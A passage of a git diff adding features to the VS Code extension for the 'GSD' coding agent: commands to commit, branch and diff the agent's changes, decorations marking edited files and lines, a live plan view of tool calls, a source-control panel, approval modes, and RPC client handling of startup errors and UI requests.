+	// -- Git commands -------------------------------------------------------
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.commitAgentChanges", () => {
+			gitIntegration?.commitAgentChanges();
+		}),
+	);
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.createAgentBranch", () => {
+			gitIntegration?.createAgentBranch();
+		}),
+	);
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.showAgentDiff", () => {
+			gitIntegration?.showAgentDiff();
+		}),
+	);
+
 	// -- Auto-start ---------------------------------------------------------
 
 	if (config.get<boolean>("autoStart", false)) {
@@ -354,6 +968,24 @@ export function activate(context: vscode.ExtensionContext): void {
 export function deactivate(): void {
 	client?.dispose();
 	sidebarProvider?.dispose();
+	fileDecorations?.dispose();
+	sessionTreeProvider?.dispose();
+	activityFeedProvider?.dispose();
+	changeTracker?.dispose();
+	scmProvider?.dispose();
+	diagnosticBridge?.dispose();
+	lineDecorations?.dispose();
+	gitIntegration?.dispose();
+	permissionManager?.dispose();
 	client = undefined;
 	sidebarProvider = undefined;
+	fileDecorations = undefined;
+	sessionTreeProvider = undefined;
+	activityFeedProvider = undefined;
+	changeTracker = undefined;
+	scmProvider = undefined;
+	diagnosticBridge = undefined;
+	lineDecorations = undefined;
+	gitIntegration = undefined;
+	permissionManager = undefined;
 }
diff --git a/vscode-extension/src/file-decorations.ts b/vscode-extension/src/file-decorations.ts
new file mode 100644
index 000000000..74f48c994
--- /dev/null
+++ b/vscode-extension/src/file-decorations.ts
@@ -0,0 +1,84 @@
+import * as vscode from "vscode";
+import type { AgentEvent, GsdClient } from "./gsd-client.js";
+
+/**
+ * Badges files in the VS Code explorer that GSD has written or edited
+ * during the current session.
+ */
+export class GsdFileDecorationProvider implements vscode.FileDecorationProvider, vscode.Disposable {
+	private readonly _onDidChangeFileDecorations = new vscode.EventEmitter<vscode.Uri | vscode.Uri[] | undefined>();
+	readonly onDidChangeFileDecorations = this._onDidChangeFileDecorations.event;
+
+	private modifiedUris = new Set<string>();
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly client: GsdClient) {
+		this.disposables.push(
+			this._onDidChangeFileDecorations,
+			client.onEvent((evt: AgentEvent) => this.handleEvent(evt)),
+			client.onConnectionChange((connected) => {
+				if (!connected) {
+					this.clear();
+				}
+			}),
+		);
+	}
+
+	private handleEvent(evt: AgentEvent): void {
+		if (evt.type !== "tool_execution_start") {
+			return;
+		}
+		const toolName = evt.toolName as string | undefined;
+		if (toolName !== "Write" && toolName !== "Edit") {
+			return;
+		}
+		const toolInput = evt.toolInput as Record<string, unknown> | undefined;
+		const fp = toolInput?.file_path ? String(toolInput.file_path) : undefined;
+		if (!fp) {
+			return;
+		}
+		const uri = resolveUri(fp);
+		if (uri) {
+			this.modifiedUris.add(uri.toString());
+			this._onDidChangeFileDecorations.fire(uri);
+		}
+	}
+
+	provideFileDecoration(uri: vscode.Uri): vscode.FileDecoration | undefined {
+		if (this.modifiedUris.has(uri.toString())) {
+			return {
+				badge: "G",
+				tooltip: "Modified by GSD",
+				color: new vscode.ThemeColor("gitDecoration.modifiedResourceForeground"),
+			};
+		}
+		return undefined;
+	}
+
+	clear(): void {
+		this.modifiedUris.clear();
+		this._onDidChangeFileDecorations.fire(undefined);
+	}
+
+	dispose(): void {
+		this.clear();
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+}
+
+function resolveUri(fp: string): vscode.Uri | null {
+	try {
+		if (fp.startsWith("/") || /^[A-Za-z]:[\\/]/.test(fp)) {
+			return vscode.Uri.file(fp);
+		}
+		const folders = vscode.workspace.workspaceFolders;
+		if (!folders?.length) {
+			return null;
+		}
+		return vscode.Uri.joinPath(folders[0].uri, fp);
+	} catch {
+		return null;
+	}
+}
diff --git a/vscode-extension/src/git-integration.ts b/vscode-extension/src/git-integration.ts
new file mode 100644
index 000000000..82f727d51
--- /dev/null
+++ b/vscode-extension/src/git-integration.ts
@@ -0,0 +1,122 @@
+import * as vscode from "vscode";
+import { execFile } from "node:child_process";
+import type { GsdChangeTracker } from "./change-tracker.js";
+
+/**
+ * Provides git integration for agent changes — commit, branch, and diff.
+ */
+export class GsdGitIntegration implements vscode.Disposable {
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(
+		private readonly tracker: GsdChangeTracker,
+		private readonly cwd: string,
+	) {}
+
+	/**
+	 * Commit all files modified by the agent with a user-provided message.
+	 */
+	async commitAgentChanges(): Promise<void> {
+		const files = this.tracker.modifiedFiles;
+		if (files.length === 0) {
+			vscode.window.showInformationMessage("No agent changes to commit.");
+			return;
+		}
+
+		const defaultMsg = `feat: agent changes (${files.length} file${files.length !== 1 ? "s" : ""})`;
+		const message = await vscode.window.showInputBox({
+			prompt: "Commit message for agent changes",
+			value: defaultMsg,
+			placeHolder: "feat: describe the changes",
+		});
+		if (!message) return;
+
+			try {
+				// Stage the modified files
+				await this.git(["add", ...files]);
+				// Commit
+				await this.git(["commit", "-m", message]);
+
+			// Accept all changes (clear tracking since they're committed)
+			this.tracker.acceptAll();
+
+			vscode.window.showInformationMessage(`Committed ${files.length} file${files.length !== 1 ? "s" : ""}.`);
+		} catch (err) {
+			const msg = err instanceof Error ? err.message : String(err);
+			vscode.window.showErrorMessage(`Git commit failed: ${msg}`);
+		}
+	}
+
+	/**
+	 * Create a new branch for agent work and switch to it.
+	 */
+	async createAgentBranch(): Promise<void> {
+		const branchName = await vscode.window.showInputBox({
+			prompt: "Branch name for agent work",
+			placeHolder: "feat/agent-changes",
+			validateInput: (value) => {
+				if (!value.trim()) return "Branch name is required";
+				if (/\s/.test(value)) return "Branch name cannot contain spaces";
+				return null;
+			},
+		});
+		if (!branchName) return;
+
+			try {
+				await this.git(["checkout", "-b", branchName]);
+			vscode.window.showInformationMessage(`Created and switched to branch: ${branchName}`);
+		} catch (err) {
+			const msg = err instanceof Error ? err.message : String(err);
+			vscode.window.showErrorMessage(`Failed to create branch: ${msg}`);
+		}
+	}
+
+	/**
+	 * Show a git diff of all agent-modified files.
+	 */
+	async showAgentDiff(): Promise<void> {
+		const files = this.tracker.modifiedFiles;
+		if (files.length === 0) {
+			vscode.window.showInformationMessage("No agent changes to diff.");
+			return;
+		}
+
+			try {
+				const diff = await this.git(["diff"]);
+				if (!diff.trim()) {
+					// Files may be untracked — show status instead
+					const status = await this.git(["status", "--short"]);
+				const channel = vscode.window.createOutputChannel("GSD Git Diff");
+				channel.appendLine("# Agent-modified files (unstaged):");
+				channel.appendLine(status);
+				channel.show();
+			} else {
+				const channel = vscode.window.createOutputChannel("GSD Git Diff");
+				channel.clear();
+				channel.appendLine(diff);
+				channel.show();
+			}
+		} catch (err) {
+			const msg = err instanceof Error ? err.message : String(err);
+			vscode.window.showErrorMessage(`Git diff failed: ${msg}`);
+		}
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+
+	private git(args: string[]): Promise<string> {
+		return new Promise((resolve, reject) => {
+			execFile("git", args, { cwd: this.cwd, maxBuffer: 10 * 1024 * 1024 }, (err, stdout, stderr) => {
+				if (err) {
+					reject(new Error(stderr.trim() || err.message));
+				} else {
+					resolve(stdout);
+				}
+			});
+		});
+	}
+}
diff --git a/vscode-extension/src/gsd-client.ts b/vscode-extension/src/gsd-client.ts
index 20db6d327..b2a872c5e 100644
--- a/vscode-extension/src/gsd-client.ts
+++ b/vscode-extension/src/gsd-client.ts
@@ -87,6 +87,7 @@ export class GsdClient implements vscode.Disposable {
 	private buffer = "";
 	private restartCount = 0;
 	private restartTimestamps: number[] = [];
+	private _autoRetryEnabled = false;
 
 	private readonly _onEvent = new vscode.EventEmitter<AgentEvent>();
 	readonly onEvent = this._onEvent.event;
@@ -110,6 +111,10 @@ export class GsdClient implements vscode.Disposable {
 		return this.process !== null && this.process.exitCode === null;
 	}
 
+	get autoRetryEnabled(): boolean {
+		return this._autoRetryEnabled;
+	}
+
 	/**
 	 * Spawn the GSD agent in RPC mode.
 	 */
@@ -118,28 +123,78 @@ export class GsdClient implements vscode.Disposable {
 			return;
 		}
 
-		this.process = spawn(this.binaryPath, ["--mode", "rpc", "--no-session"], {
+		const proc = spawn(this.binaryPath, ["--mode", "rpc"], {
 			cwd: this.cwd,
 			stdio: ["pipe", "pipe", "pipe"],
 			env: { ...process.env },
 		});
+		this.process = proc;
 
 		this.buffer = "";
 
-		this.process.stdout?.on("data", (chunk: Buffer) => {
+		proc.stdout?.on("data", (chunk: Buffer) => {
 			this.buffer += chunk.toString("utf8");
 			this.drainBuffer();
 		});
 
-		this.process.stderr?.on("data", (chunk: Buffer) => {
+		proc.stderr?.on("data", (chunk: Buffer) => {
 			const text = chunk.toString("utf8").trim();
 			if (text) {
 				this._onError.fire(text);
 			}
 		});
 
-		this.process.on("exit", (code, signal) => {
-			this.process = null;
+		let startupSettled = false;
+		const startupResult = new Promise<void>((resolve, reject) => {
+			const cleanup = () => {
+				proc.off("spawn", handleSpawn);
+				proc.off("error", handleStartupError);
+			};
+			const handleSpawn = () => {
+				if (startupSettled) return;
+				startupSettled = true;
+				cleanup();
+				this._onConnectionChange.fire(true);
+				this.restartCount = 0;
+				resolve();
+			};
+			const handleStartupError = (err: NodeJS.ErrnoException) => {
+				if (startupSettled) return;
+				startupSettled = true;
+				cleanup();
+				if (this.process === proc) {
+					this.process = null;
+				}
+				const hint = err.code === "ENOENT"
+					? ` Make sure GSD is installed ("npm install -g gsd-pi") and set "gsd.binaryPath" to the absolute path if it is not on PATH.`
+					: "";
+				const message = `Failed to start GSD process: ${err.message}.${hint}`;
+				this._onError.fire(message);
+				reject(new Error(message));
+			};
+
+			proc.once("spawn", handleSpawn);
+			proc.once("error", handleStartupError);
+		});
+
+		proc.on("error", (err: NodeJS.ErrnoException) => {
+			if (!startupSettled) {
+				return;
+			}
+			if (this.process === proc) {
+				this.process = null;
+			}
+			this._onConnectionChange.fire(false);
+			const hint = err.code === "ENOENT"
+				? ` Make sure GSD is installed ("npm install -g gsd-pi") and set "gsd.binaryPath" to the absolute path if it is not on PATH.`
+				: "";
+			this._onError.fire(`GSD process error: ${err.message}.${hint}`);
+		});
+
+		proc.on("exit", (code, signal) => {
+			if (this.process === proc) {
+				this.process = null;
+			}
 			this.rejectAllPending(`GSD process exited (code=${code}, signal=${signal})`);
 			this._onConnectionChange.fire(false);
 
@@ -161,8 +216,7 @@ export class GsdClient implements vscode.Disposable {
 			}
 		});
 
-		this._onConnectionChange.fire(true);
-		this.restartCount = 0;
+		await startupResult;
 	}
 
 	/**
@@ -328,6 +382,7 @@ export class GsdClient implements vscode.Disposable {
 	async setAutoRetry(enabled: boolean): Promise<void> {
 		const response = await this.send({ type: "set_auto_retry", enabled });
 		this.assertSuccess(response);
+		this._autoRetryEnabled = enabled;
 	}
 
 	/**
@@ -369,6 +424,7 @@ export class GsdClient implements vscode.Disposable {
 	async newSession(): Promise<void> {
 		const response = await this.send({ type: "new_session" });
 		this.assertSuccess(response);
+		this._autoRetryEnabled = false;
 	}
 
 	/**
@@ -436,6 +492,48 @@ export class GsdClient implements vscode.Disposable {
 		return (response.data as { commands: SlashCommand[] }).commands;
 	}
 
+	// =========================================================================
+	// Fork
+	// =========================================================================
+
+	/**
+	 * Get messages that can be used as fork points.
+	 */
+	async getForkMessages(): Promise<{ entryId: string; text: string }[]> {
+		const response = await this.send({ type: "get_fork_messages" });
+		this.assertSuccess(response);
+		return (response.data as { messages: { entryId: string; text: string }[] }).messages;
+	}
+
+	/**
+	 * Fork the session at the given entry point.
+	 */
+	async forkSession(entryId: string): Promise<{ text: string; cancelled: boolean }> {
+		const response = await this.send({ type: "fork", entryId });
+		this.assertSuccess(response);
+		return response.data as { text: string; cancelled: boolean };
+	}
+
+	// =========================================================================
+	// Queue Modes
+	// =========================================================================
+
+	/**
+	 * Set steering queue mode.
+	 */
+	async setSteeringMode(mode: "all" | "one-at-a-time"): Promise<void> {
+		const response = await this.send({ type: "set_steering_mode", mode });
+		this.assertSuccess(response);
+	}
+
+	/**
+	 * Set follow-up queue mode.
+	 */
+	async setFollowUpMode(mode: "all" | "one-at-a-time"): Promise<void> {
+		const response = await this.send({ type: "set_follow_up_mode", mode });
+		this.assertSuccess(response);
+	}
+
 	dispose(): void {
 		this.stop();
 		for (const d of this.disposables) {
@@ -481,10 +579,104 @@ export class GsdClient implements vscode.Disposable {
 			return;
 		}
 
+		// Extension UI request — agent needs user input
+		if (data.type === "extension_ui_request" && typeof data.id === "string") {
+			void this.handleUIRequest(data);
+			return;
+		}
+
 		// Streaming event
 		this._onEvent.fire(data as AgentEvent);
 	}
 
+	private async handleUIRequest(request: Record<string, unknown>): Promise<void> {
+		const id = request.id as string;
+		const method = request.method as string;
+
+		try {
+			switch (method) {
+				case "select": {
+					const options = (request.options as string[]) ?? [];
+					const title = String(request.title ?? "Select");
+					const allowMultiple = request.allowMultiple === true;
+
+					if (allowMultiple) {
+						const picked = await vscode.window.showQuickPick(options, {
+							title,
+							canPickMany: true,
+						});
+						if (picked) {
+							this.sendRaw({ type: "extension_ui_response", id, values: picked });
+						} else {
+							this.sendRaw({ type: "extension_ui_response", id, cancelled: true });
+						}
+					} else {
+						const picked = await vscode.window.showQuickPick(options, { title });
+						if (picked) {
+							this.sendRaw({ type: "extension_ui_response", id, value: picked });
+						} else {
+							this.sendRaw({ type: "extension_ui_response", id, cancelled: true });
+						}
+					}
+					break;
+				}
+
+				case "confirm": {
+					const title = String(request.title ?? "Confirm");
+					const message = String(request.message ?? "");
+					const result = await vscode.window.showInformationMessage(
+						`${title}: ${message}`,
+						{ modal: true },
+						"Yes",
+						"No",
+					);
+					this.sendRaw({ type: "extension_ui_response", id, confirmed: result === "Yes" });
+					break;
+				}
+
+				case "input": {
+					const title = String(request.title ?? "Input");
+					const placeholder = String(request.placeholder ?? "");
+					const value = await vscode.window.showInputBox({ title, placeHolder: placeholder });
+					if (value !== undefined) {
+						this.sendRaw({ type: "extension_ui_response", id, value });
+					} else {
+						this.sendRaw({ type: "extension_ui_response", id, cancelled: true });
+					}
+					break;
+				}
+
+				case "notify": {
+					const message = String(request.message ?? "");
+					const notifyType = String(request.notifyType ?? "info");
+					if (notifyType === "error") {
+						vscode.window.showErrorMessage(`GSD: ${message}`);
+					} else if (notifyType === "warning") {
+						vscode.window.showWarningMessage(`GSD: ${message}`);
+					} else {
+						vscode.window.showInformationMessage(`GSD: ${message}`);
+					}
+					// Notify doesn't need a response
+					break;
+				}
+
+				default:
+					// Unknown method — cancel to unblock the agent
+					this.sendRaw({ type: "extension_ui_response", id, cancelled: true });
+					break;
+			}
+		} catch {
+			// On error, cancel to unblock
+			this.sendRaw({ type: "extension_ui_response", id, cancelled: true });
+		}
+	}
+
+	private sendRaw(data: Record<string, unknown>): void {
+		if (this.process?.stdin) {
+			this.process.stdin.write(JSON.stringify(data) + "\n");
+		}
+	}
+
 	private send(command: Record<string, unknown>): Promise<RpcResponse> {
 		if (!this.process?.stdin) {
 			return Promise.reject(new Error("GSD client not started"));
diff --git a/vscode-extension/src/line-decorations.ts b/vscode-extension/src/line-decorations.ts
new file mode 100644
index 000000000..387986f79
--- /dev/null
+++ b/vscode-extension/src/line-decorations.ts
@@ -0,0 +1,130 @@
+import * as vscode from "vscode";
+import type { GsdChangeTracker } from "./change-tracker.js";
+
+/**
+ * Provides line-level editor decorations for files modified by the GSD agent.
+ * Shows subtle background highlights on changed lines and gutter icons.
+ */
+export class GsdLineDecorationManager implements vscode.Disposable {
+	private readonly addedDecoration: vscode.TextEditorDecorationType;
+	private readonly modifiedDecoration: vscode.TextEditorDecorationType;
+	private readonly gutterDecoration: vscode.TextEditorDecorationType;
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly tracker: GsdChangeTracker) {
+		this.addedDecoration = vscode.window.createTextEditorDecorationType({
+			isWholeLine: true,
+			backgroundColor: "rgba(78, 201, 176, 0.07)",
+			overviewRulerColor: "rgba(78, 201, 176, 0.5)",
+			overviewRulerLane: vscode.OverviewRulerLane.Left,
+		});
+
+		this.modifiedDecoration = vscode.window.createTextEditorDecorationType({
+			isWholeLine: true,
+			backgroundColor: "rgba(204, 167, 0, 0.07)",
+			overviewRulerColor: "rgba(204, 167, 0, 0.5)",
+			overviewRulerLane: vscode.OverviewRulerLane.Left,
+		});
+
+		this.gutterDecoration = vscode.window.createTextEditorDecorationType({
+			gutterIconPath: new vscode.ThemeIcon("hubot").id, // fallback
+			gutterIconSize: "contain",
+			// Use a colored left border as a gutter indicator (more reliable than icons)
+			borderWidth: "0 0 0 3px",
+			borderStyle: "solid",
+			borderColor: "rgba(78, 201, 176, 0.4)",
+		});
+
+		this.disposables.push(
+			this.addedDecoration,
+			this.modifiedDecoration,
+			this.gutterDecoration,
+		);
+
+		// Refresh decorations when tracked files change
+		this.disposables.push(
+			tracker.onDidChange(() => this.refreshAll()),
+			vscode.window.onDidChangeActiveTextEditor(() => this.refreshAll()),
+			vscode.workspace.onDidChangeTextDocument((e) => {
+				const editor = vscode.window.activeTextEditor;
+				if (editor && e.document === editor.document) {
+					this.refreshEditor(editor);
+				}
+			}),
+		);
+	}
+
+	private refreshAll(): void {
+		for (const editor of vscode.window.visibleTextEditors) {
+			this.refreshEditor(editor);
+		}
+	}
+
+	private refreshEditor(editor: vscode.TextEditor): void {
+		const filePath = editor.document.uri.fsPath;
+		const original = this.tracker.getOriginal(filePath);
+
+		if (original === undefined) {
+			// No tracked changes for this file — clear decorations
+			editor.setDecorations(this.addedDecoration, []);
+			editor.setDecorations(this.modifiedDecoration, []);
+			editor.setDecorations(this.gutterDecoration, []);
+			return;
+		}
+
+		const currentLines = editor.document.getText().split("\n");
+		const originalLines = original.split("\n");
+		const { added, modified } = diffLines(originalLines, currentLines);
+
+		const addedRanges = added.map((line) => {
+			const range = new vscode.Range(line, 0, line, currentLines[line]?.length ?? 0);
+			return { range, hoverMessage: new vscode.MarkdownString("$(hubot) *Added by GSD Agent*") };
+		});
+
+		const modifiedRanges = modified.map((line) => {
+			const range = new vscode.Range(line, 0, line, currentLines[line]?.length ?? 0);
+			return { range, hoverMessage: new vscode.MarkdownString("$(hubot) *Modified by GSD Agent*") };
+		});
+
+		const gutterRanges = [...added, ...modified].map((line) => ({
+			range: new vscode.Range(line, 0, line, 0),
+		}));
+
+		editor.setDecorations(this.addedDecoration, addedRanges);
+		editor.setDecorations(this.modifiedDecoration, modifiedRanges);
+		editor.setDecorations(this.gutterDecoration, gutterRanges);
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+}
+
+/**
+ * Simple line-level diff: compare original vs current line-by-line.
+ * Returns arrays of line numbers that were added or modified.
+ */
+function diffLines(
+	originalLines: string[],
+	currentLines: string[],
+): { added: number[]; modified: number[] } {
+	const added: number[] = [];
+	const modified: number[] = [];
+
+	const maxShared = Math.min(originalLines.length, currentLines.length);
+
+	for (let i = 0; i < maxShared; i++) {
+		if (originalLines[i] !== currentLines[i]) {
+			modified.push(i);
+		}
+	}
+
+	// Lines beyond original length are "added"
+	for (let i = originalLines.length; i < currentLines.length; i++) {
+		added.push(i);
+	}
+
+	return { added, modified };
+}
diff --git a/vscode-extension/src/permissions.ts b/vscode-extension/src/permissions.ts
new file mode 100644
index 000000000..32bcc9511
--- /dev/null
+++ b/vscode-extension/src/permissions.ts
@@ -0,0 +1,143 @@
+import * as vscode from "vscode";
+import type { GsdClient, AgentEvent } from "./gsd-client.js";
+
+type ApprovalMode = "ask" | "auto-approve" | "plan-only";
+
+/**
+ * Permission/approval system for agent actions.
+ * Can be configured to prompt before file writes, command execution, etc.
+ */
+export class GsdPermissionManager implements vscode.Disposable {
+	private _mode: ApprovalMode = "auto-approve";
+	private disposables: vscode.Disposable[] = [];
+
+	private readonly _onModeChange = new vscode.EventEmitter<ApprovalMode>();
+	readonly onModeChange = this._onModeChange.event;
+
+	constructor(private readonly client: GsdClient) {
+		// Load saved mode from configuration
+		this._mode = vscode.workspace.getConfiguration("gsd").get<ApprovalMode>("approvalMode", "auto-approve");
+
+		this.disposables.push(
+			this._onModeChange,
+			vscode.workspace.onDidChangeConfiguration((e) => {
+				if (e.affectsConfiguration("gsd.approvalMode")) {
+					this._mode = vscode.workspace.getConfiguration("gsd").get<ApprovalMode>("approvalMode", "auto-approve");
+					this._onModeChange.fire(this._mode);
+				}
+			}),
+		);
+
+		// If mode is "ask", intercept tool executions for write operations
+		if (this._mode === "ask") {
+			this.disposables.push(
+				client.onEvent((evt) => this.handleEvent(evt)),
+			);
+		}
+	}
+
+	get mode(): ApprovalMode {
+		return this._mode;
+	}
+
+	/**
+	 * Cycle through approval modes: auto-approve -> ask -> plan-only -> auto-approve
+	 */
+	async cycleMode(): Promise<void> {
+		const modes: ApprovalMode[] = ["auto-approve", "ask", "plan-only"];
+		const currentIdx = modes.indexOf(this._mode);
+		this._mode = modes[(currentIdx + 1) % modes.length];
+
+		await vscode.workspace.getConfiguration("gsd").update("approvalMode", this._mode, vscode.ConfigurationTarget.Workspace);
+		this._onModeChange.fire(this._mode);
+
+		const labels: Record<ApprovalMode, string> = {
+			"auto-approve": "Auto-Approve (agent runs freely)",
+			"ask": "Ask (prompt before file changes)",
+			"plan-only": "Plan Only (read-only, no writes)",
+		};
+		vscode.window.showInformationMessage(`Approval mode: ${labels[this._mode]}`);
+	}
+
+	/**
+	 * Show a QuickPick to select approval mode.
+	 */
+	async selectMode(): Promise<void> {
+		const items: (vscode.QuickPickItem & { mode: ApprovalMode })[] = [
+			{
+				label: "$(check) Auto-Approve",
+				description: "Agent runs freely without prompts",
+				detail: "Best for trusted workflows. The agent can read, write, and execute without asking.",
+				mode: "auto-approve",
+			},
+			{
+				label: "$(shield) Ask",
+				description: "Prompt before file changes",
+				detail: "The agent will ask for approval before writing or editing files.",
+				mode: "ask",
+			},
+			{
+				label: "$(eye) Plan Only",
+				description: "Read-only mode, no writes allowed",
+				detail: "The agent can read and analyze but cannot modify files or run commands.",
+				mode: "plan-only",
+			},
+		];
+
+		const selected = await vscode.window.showQuickPick(items, {
+			placeHolder: `Current mode: ${this._mode}`,
+		});
+
+		if (selected) {
+			this._mode = selected.mode;
+			await vscode.workspace.getConfiguration("gsd").update("approvalMode", this._mode, vscode.ConfigurationTarget.Workspace);
+			this._onModeChange.fire(this._mode);
+		}
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+
+	private async handleEvent(evt: AgentEvent): Promise<void> {
+		if (this._mode !== "ask") return;
+		if (evt.type !== "tool_execution_start") return;
+
+		const toolName = String(evt.toolName ?? "");
+		if (toolName !== "Write" && toolName !== "Edit" && toolName !== "Bash") return;
+
+		const toolInput = (evt.toolInput ?? {}) as Record<string, unknown>;
+		let description = "";
+
+		switch (toolName) {
+			case "Write":
+			case "Edit": {
+				const filePath = String(toolInput.file_path ?? "");
+				const shortPath = filePath.split(/[\\/]/).slice(-3).join("/");
+				description = `${toolName}: ${shortPath}`;
+				break;
+			}
+			case "Bash": {
+				const cmd = String(toolInput.command ?? "").slice(0, 80);
+				description = `Execute: ${cmd}`;
+				break;
+			}
+		}
+
+		// Note: In practice, the RPC protocol doesn't support blocking tool execution
+		// for approval. This notification serves as awareness — the user sees what's
+		// happening and can abort if needed. True blocking approval would require
+		// protocol changes in the RPC server.
+		vscode.window.showInformationMessage(
+			`Agent: ${description}`,
+			"OK",
+			"Abort",
+		).then((choice) => {
+			if (choice === "Abort") {
+				this.client.abort().catch(() => {});
+			}
+		});
+	}
+}
diff --git a/vscode-extension/src/plan-viewer.ts b/vscode-extension/src/plan-viewer.ts
new file mode 100644
index 000000000..a45b20978
--- /dev/null
+++ b/vscode-extension/src/plan-viewer.ts
@@ -0,0 +1,190 @@
+import * as vscode from "vscode";
+import type { GsdClient, AgentEvent } from "./gsd-client.js";
+
+interface PlanStep {
+	id: number;
+	tool: string;
+	description: string;
+	status: "pending" | "running" | "done" | "error";
+	timestamp: number;
+	duration?: number;
+}
+
+/**
+ * TreeDataProvider that shows a plan-like view of agent tool executions.
+ * Displays steps as they happen, showing what the agent is doing and
+ * what it has completed — a live execution plan.
+ */
+export class GsdPlanViewerProvider implements vscode.TreeDataProvider<PlanStep>, vscode.Disposable {
+	public static readonly viewId = "gsd-plan";
+
+	private readonly _onDidChangeTreeData = new vscode.EventEmitter<void>();
+	readonly onDidChangeTreeData = this._onDidChangeTreeData.event;
+
+	private steps: PlanStep[] = [];
+	private nextId = 0;
+	private runningTools = new Map<string, number>(); // toolUseId -> step id
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly client: GsdClient) {
+		this.disposables.push(
+			this._onDidChangeTreeData,
+			client.onEvent((evt) => this.handleEvent(evt)),
+			client.onConnectionChange((connected) => {
+				if (!connected) {
+					this.steps = [];
+					this.runningTools.clear();
+					this._onDidChangeTreeData.fire();
+				}
+			}),
+		);
+	}
+
+	getTreeItem(step: PlanStep): vscode.TreeItem {
+		const icon = stepIcon(step.status);
+		const item = new vscode.TreeItem(step.description, vscode.TreeItemCollapsibleState.None);
+		item.iconPath = icon;
+		item.description = step.duration !== undefined ? `${step.duration}ms` : step.status === "running" ? "running..." : "";
+
+		const time = new Date(step.timestamp).toLocaleTimeString([], { hour: "2-digit", minute: "2-digit", second: "2-digit" });
+		item.tooltip = `${step.tool}: ${step.description}\nStatus: ${step.status}\nTime: ${time}`;
+
+		return item;
+	}
+
+	getChildren(): PlanStep[] {
+		return this.steps;
+	}
+
+	clear(): void {
+		this.steps = [];
+		this.runningTools.clear();
+		this._onDidChangeTreeData.fire();
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+
+	private handleEvent(evt: AgentEvent): void {
+		switch (evt.type) {
+			case "agent_start": {
+				// Don't clear — keep history visible. Add a separator.
+				if (this.steps.length > 0) {
+					this.steps.push({
+						id: this.nextId++,
+						tool: "separator",
+						description: "--- New Turn ---",
+						status: "done",
+						timestamp: Date.now(),
+					});
+				}
+				this.steps.push({
+					id: this.nextId++,
+					tool: "agent",
+					description: "Agent started",
+					status: "running",
+					timestamp: Date.now(),
+				});
+				this._onDidChangeTreeData.fire();
+				break;
+			}
+
+			case "agent_end": {
+				// Mark the agent step as done
+				const agentStep = [...this.steps].reverse().find((s) => s.tool === "agent" && s.status === "running");
+				if (agentStep) {
+					agentStep.status = "done";
+					agentStep.duration = Date.now() - agentStep.timestamp;
+					agentStep.description = "Agent finished";
+				}
+				this._onDidChangeTreeData.fire();
+				break;
+			}
+
+			case "tool_execution_start": {
+				const toolName = String(evt.toolName ?? "");
+				const toolInput = (evt.toolInput ?? {}) as Record<string, unknown>;
+				const toolUseId = String(evt.toolUseId ?? "");
+				const description = describeStep(toolName, toolInput);
+
+				const id = this.nextId++;
+				this.steps.push({
+					id,
+					tool: toolName,
+					description,
+					status: "running",
+					timestamp: Date.now(),
+				});
+
+				if (toolUseId) {
+					this.runningTools.set(toolUseId, id);
+				}
+
+				// Cap at 200 steps
+				while (this.steps.length > 200) {
+					this.steps.shift();
+				}
+
+				this._onDidChangeTreeData.fire();
+				break;
+			}
+
+			case "tool_execution_end": {
+				const toolUseId = String(evt.toolUseId ?? "");
+				const stepId = this.runningTools.get(toolUseId);
+				if (stepId !== undefined) {
+					this.runningTools.delete(toolUseId);
+					const step = this.steps.find((s) => s.id === stepId);
+					if (step) {
+						const isError = evt.error === true || evt.isError === true;
+						step.status = isError ? "error" : "done";
+						step.duration = Date.now() - step.timestamp;
+						this._onDidChangeTreeData.fire();
+					}
+				}
+				break;
+			}
+		}
+	}
+}
+
+function stepIcon(status: string): vscode.ThemeIcon {
+	switch (status) {
+		case "running":
+			return new vscode.ThemeIcon("sync~spin", new vscode.ThemeColor("charts.yellow"));
+		case "done":
+			return new vscode.ThemeIcon("pass", new vscode.ThemeColor("testing.iconPassed"));
+		case "error":
+			return new vscode.ThemeIcon("error", new vscode.ThemeColor("testing.iconFailed"));
+		default:
+			return new vscode.ThemeIcon("circle-outline");
+	}
+}
+
+function describeStep(toolName: string, input: Record<string, unknown>): string {
+	switch (toolName) {
+		case "Read": {
+			const p = String(input.file_path ?? input.path ?? "");
+			return `Read ${p.split(/[\\/]/).pop() ?? p}`;
+		}
+		case "Write": {
+			const p = String(input.file_path ?? "");
+			return `Write ${p.split(/[\\/]/).pop() ?? p}`;
+		}
+		case "Edit": {
+			const p = String(input.file_path ?? "");
+			return `Edit ${p.split(/[\\/]/).pop() ?? p}`;
+		}
+		case "Bash":
+			return `$ ${String(input.command ?? "").slice(0, 50)}`;
+		case "Grep":
+			return `Grep: ${String(input.pattern ?? "").slice(0, 40)}`;
+		case "Glob":
+			return `Glob: ${String(input.pattern ?? "").slice(0, 40)}`;
+		default:
+			return toolName;
+	}
+}
diff --git a/vscode-extension/src/scm-provider.ts b/vscode-extension/src/scm-provider.ts
new file mode 100644
index 000000000..2320ab6d5
--- /dev/null
+++ b/vscode-extension/src/scm-provider.ts
@@ -0,0 +1,124 @@
+import * as vscode from "vscode";
+import * as path from "node:path";
+import type { GsdChangeTracker } from "./change-tracker.js";
+
+const GSD_ORIGINAL_SCHEME = "gsd-original";
+
+/**
+ * Source Control provider that shows files modified by the GSD agent
+ * in a dedicated "GSD Agent" section of the Source Control panel.
+ * Supports QuickDiff to show before/after diffs, and accept/discard per-file.
+ */
+export class GsdScmProvider implements vscode.Disposable {
+	private readonly scm: vscode.SourceControl;
+	private readonly changesGroup: vscode.SourceControlResourceGroup;
+	private readonly contentProvider: GsdOriginalContentProvider;
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(
+		private readonly tracker: GsdChangeTracker,
+		private readonly workspaceRoot: string,
+	) {
+		// Register content provider for original file contents
